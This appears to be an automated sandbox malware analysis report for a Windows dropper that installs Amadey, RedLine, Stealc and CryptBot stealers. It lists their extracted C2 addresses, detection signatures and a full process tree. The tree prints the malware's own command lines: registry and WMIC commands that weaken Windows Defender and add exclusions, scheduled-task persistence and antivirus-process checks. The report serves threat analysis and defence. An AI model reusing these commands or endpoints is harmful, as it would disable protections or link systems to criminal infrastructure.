Overview

overview

10

Static

static

3

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

10

Analysis

  • max time kernel
    298s
  • max time network
    275s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2024 22:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ca6a46d48c0952e16017a9625c0270150ce319559d65a07e088e26a957292787.exe

  • Size

    1.9MB

  • MD5

    0707edd94178c25050cd0cd41474f694

  • SHA1

    56bb66a14ea3da177a3db58dfbcb86f958169f9e

  • SHA256

    ca6a46d48c0952e16017a9625c0270150ce319559d65a07e088e26a957292787

  • SHA512

    823bdfe780c723a2eb2390c471647c84fb88723e6b87d07d6ba1d44bb1c9c10d51de9fb903f9204d5e145f93b7e8d0694c1b38d43c2f2a740976f00c66b5701c

  • SSDEEP

    49152:DIw8qoSIHGwkJU2TZYFN9NhXC/vUEp+KKr:DxZoSIG02ab9LS/vXM

Score
10/10
amadeycryptbotredlinestealc@oleh_pspbundledefaultdefault2fed3aalivetraffictg cloud @rlreborn admin @fatherofcarderscredential_accessdefense_evasiondiscoveryevasionexecutioninfostealerpersistencespywarestealertrojan

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

95.179.250.45:26212

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

65.21.18.51:45580

Extracted

Family

stealc

Botnet

default2

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

stealc

Botnet

default

C2

http://91.202.233.158

Attributes
  • url_path

    /e96ea2db21fa9a1b.php

Extracted

Family

redline

Botnet

bundle

C2

185.215.113.67:15206

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

C2

89.105.223.196:29862

Extracted

Family

cryptbot

C2

sevtvf17ht.top

analforeverlovyu.top
Attributes
  • url_path

    /v1/upload.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

    spywarestealercryptbot
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
    evasiontrojan
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 14 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
    evasiontrojan
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
    evasion
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file
  • .NET Reactor proctector 3 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 32 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

    defense_evasion
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops Chrome extension 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 27 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 28 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
    evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1076
      • C:\Users\Admin\AppData\Local\Temp\ca6a46d48c0952e16017a9625c0270150ce319559d65a07e088e26a957292787.exe
        "C:\Users\Admin\AppData\Local\Temp\ca6a46d48c0952e16017a9625c0270150ce319559d65a07e088e26a957292787.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3000
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2864
          • C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:688
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:400
          • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
            "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2716
            • C:\Users\Admin\AppData\Roaming\xYT1HzOhNm.exe
              "C:\Users\Admin\AppData\Roaming\xYT1HzOhNm.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1724
            • C:\Users\Admin\AppData\Roaming\AhfgwXRKMb.exe
              "C:\Users\Admin\AppData\Roaming\AhfgwXRKMb.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2908
          • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
            "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in Windows directory
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:1636
            • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
              "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1408
              • C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe
                "C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:3056
                • C:\Users\Admin\AppData\Local\Temp\service123.exe
                  "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:2872
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:1984
          • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:2108
          • C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
            "C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:852
            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:584
          • C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
            "C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1988
          • C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
            "C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2900
            • C:\Users\Admin\AppData\Local\Temp\filename.exe
              "C:\Users\Admin\AppData\Local\Temp\filename.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1720
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im "filename.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\filename.exe" & exit
                6⤵
                • System Location Discovery: System Language Discovery
                PID:3304
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im "filename.exe" /f
                  7⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3376
          • C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe
            "C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of AdjustPrivilegeToken
            PID:2964
          • C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2016
          • C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe
            "C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"
            4⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            PID:860
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
              5⤵
              • Loads dropped DLL
              PID:352
              • C:\Windows\SysWOW64\tasklist.exe
                tasklist
                6⤵
                • Enumerates processes with tasklist
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2256
              • C:\Windows\SysWOW64\findstr.exe
                findstr /I "wrsa opssvc"
                6⤵
                  PID:2036
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  6⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1964
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2004
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c md 607698
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:772
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /V "MaskBathroomCompositionInjection" Participants
                  6⤵
                    PID:1496
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
                    6⤵
                      PID:1644
                    • C:\Users\Admin\AppData\Local\Temp\607698\Waters.pif
                      Waters.pif Q
                      6⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:624
                    • C:\Windows\SysWOW64\choice.exe
                      choice /d y /t 5
                      6⤵
                        PID:2392
                  • C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    PID:1728
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1508
                  • C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:1500
                    • C:\Users\Admin\AppData\Local\Temp\7zS13FE.tmp\Install.exe
                      .\Install.exe
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:2336
                      • C:\Users\Admin\AppData\Local\Temp\7zS15B2.tmp\Install.exe
                        .\Install.exe /RNXdidDHt "385121" /S
                        6⤵
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        • Enumerates system info in registry
                        PID:2624
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                          7⤵
                            PID:2008
                            • C:\Windows\SysWOW64\forfiles.exe
                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                              8⤵
                              • Indirect Command Execution
                              PID:1664
                              • C:\Windows\SysWOW64\cmd.exe
                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                9⤵
                                  PID:2380
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                    10⤵
                                      PID:2636
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                  8⤵
                                  • Indirect Command Execution
                                  PID:2784
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                    9⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2388
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                      10⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1212
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                  8⤵
                                  • Indirect Command Execution
                                  PID:276
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                    9⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3068
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                      10⤵
                                        PID:1412
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                    8⤵
                                    • Indirect Command Execution
                                    PID:2892
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                      9⤵
                                        PID:568
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                          10⤵
                                            PID:2608
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                        8⤵
                                        • Indirect Command Execution
                                        PID:1696
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                          9⤵
                                            PID:2664
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                              10⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Drops file in System32 directory
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2760
                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                "C:\Windows\system32\gpupdate.exe" /force
                                                11⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:688
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                        7⤵
                                        • Indirect Command Execution
                                        • System Location Discovery: System Language Discovery
                                        PID:1944
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                          8⤵
                                            PID:328
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Drops file in System32 directory
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2372
                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                10⤵
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1744
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /CREATE /TN "bAqRDoFVIdSJfWxTlj" /SC once /ST 22:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\tKpoBoM.exe\" PV /csIOdidbHNk 385121 /S" /V1 /F
                                          7⤵
                                          • Drops file in Windows directory
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2520
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 596
                                          7⤵
                                          • Loads dropped DLL
                                          • Program crash
                                          PID:1668
                                  • C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of SetWindowsHookEx
                                    PID:1180
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1068
                                      5⤵
                                      • Loads dropped DLL
                                      • Program crash
                                      PID:2608
                                  • C:\Users\Admin\AppData\Local\Temp\1000309001\56d2a5d766.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000309001\56d2a5d766.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: GetForegroundWindowSpam
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    PID:1280
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                      5⤵
                                        PID:400
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                          6⤵
                                          • Checks processor information in registry
                                          • Modifies registry class
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of FindShellTrayWindow
                                          • Suspicious use of SendNotifyMessage
                                          PID:1288
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1288.0.697502764\1175729385" -parentBuildID 20221007134813 -prefsHandle 1260 -prefMapHandle 1116 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c60cda5-7069-4d6a-b50a-38008c925971} 1288 "\\.\pipe\gecko-crash-server-pipe.1288" 1336 105f0a58 gpu
                                            7⤵
                                              PID:2952
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1288.1.1561770252\55227506" -parentBuildID 20221007134813 -prefsHandle 1536 -prefMapHandle 1532 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {66efe688-2749-4883-a9af-e5e1f0397285} 1288 "\\.\pipe\gecko-crash-server-pipe.1288" 1548 f4eb258 socket
                                              7⤵
                                                PID:1572
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1288.2.707514328\2117673897" -childID 1 -isForBrowser -prefsHandle 1892 -prefMapHandle 1888 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 584 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e7852ce-2d20-4bf2-a4b1-f8654b5984b8} 1288 "\\.\pipe\gecko-crash-server-pipe.1288" 1904 18d5c658 tab
                                                7⤵
                                                  PID:2016
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1288.3.958497010\713991958" -childID 2 -isForBrowser -prefsHandle 2668 -prefMapHandle 2664 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 584 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7a1b278-d4cc-4751-b522-905ca7a390f5} 1288 "\\.\pipe\gecko-crash-server-pipe.1288" 2680 1d59d258 tab
                                                  7⤵
                                                    PID:2744
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1288.4.1164221662\1580932023" -childID 3 -isForBrowser -prefsHandle 3440 -prefMapHandle 2428 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 584 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f9de302e-1123-4a7f-addc-e82ce8779715} 1288 "\\.\pipe\gecko-crash-server-pipe.1288" 3808 1f937958 tab
                                                    7⤵
                                                      PID:3468
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1288.5.1646579872\1783729260" -childID 4 -isForBrowser -prefsHandle 3928 -prefMapHandle 3932 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 584 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f970d0d6-a1c2-4ba7-b2cc-89b9aff79f5e} 1288 "\\.\pipe\gecko-crash-server-pipe.1288" 3916 1f938258 tab
                                                      7⤵
                                                        PID:3476
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1288.6.730093233\1489375469" -childID 5 -isForBrowser -prefsHandle 4088 -prefMapHandle 4092 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 584 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f88278ec-9ad2-4dc7-9c68-2dca3dc42ad5} 1288 "\\.\pipe\gecko-crash-server-pipe.1288" 4076 1f937c58 tab
                                                        7⤵
                                                          PID:3484
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                      5⤵
                                                        PID:1592
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                          6⤵
                                                            PID:3212
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                          5⤵
                                                            PID:2552
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                              6⤵
